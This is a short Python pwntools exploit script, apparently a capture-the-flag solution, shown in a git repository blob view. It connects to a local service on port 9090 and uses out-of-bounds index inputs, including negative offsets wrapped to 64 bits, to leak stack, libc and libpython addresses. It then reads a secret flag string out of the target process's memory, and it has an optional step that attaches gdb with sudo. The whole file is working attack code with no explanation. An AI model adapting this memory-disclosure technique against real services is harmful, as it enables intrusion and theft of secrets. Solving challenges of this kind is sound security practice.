blob: e1b819245bf0cc37fcb145f4ebaaede13dd93505 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
from pwn import *
import psutil
import time
io = remote("localhost", 9090)
if args.DEBUG:
time.sleep(1)
filter = lambda p : "game.py" in p.cmdline()
pid = [p.pid for p in psutil.process_iter() if filter(p)][0]
util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pid}")
input()
def leak(offset, unpack=True):
io.readuntil(b"Easy or Hard? ")
io.sendline(b"hard")
io.readuntil("Ready? ")
io.sendline(b"")
leak = []
for i in range(8):
io.readuntil(b"Index 1: ")
io.sendline(str(0).encode())
io.readuntil(b"Index 2: ")
if offset < 0:
io.sendline(str((1 << 64) + offset + i).encode())
else:
io.sendline(str(offset + i).encode())
line = io.readline()
leak.append(int(line.split(b" ")[1]))
if unpack:
return struct.unpack("<Q", bytes(leak))[0]
else:
return bytes(leak)
# stack_leak = leak(-0x28)
# numbers = stack_leak - 0x100
# print("numbers", hex(numbers))
#
# libc_leak = leak(-0x18)
# libc_clock_gettime = 0x00000000000cd6a0
# libc_base = libc_leak - 29 - libc_clock_gettime
# print("libc", hex(libc_base))
#
# libpython_base = libc_base + 0x1e7000
# print("libpython", hex(libpython_base))
#
# pythonvars_leak = libpython_base + 0x390858
# vars_base = leak(pythonvars_leak - numbers)
# print("pythonvars", hex(vars_base))
#
# flag_var = vars_base + 0x7fd00
# print("flag", hex(flag_var))
#for i in range(10):
# print(leak(flag_var + i * 8 - numbers, False))
numbers = leak(-0x30)
print(numbers)
flagobj = leak(-0xb48)
print(flagobj)
flagstr = flagobj + 0x30
for i in range(4):
print(leak(flagstr + i * 8 - numbers, False))
|
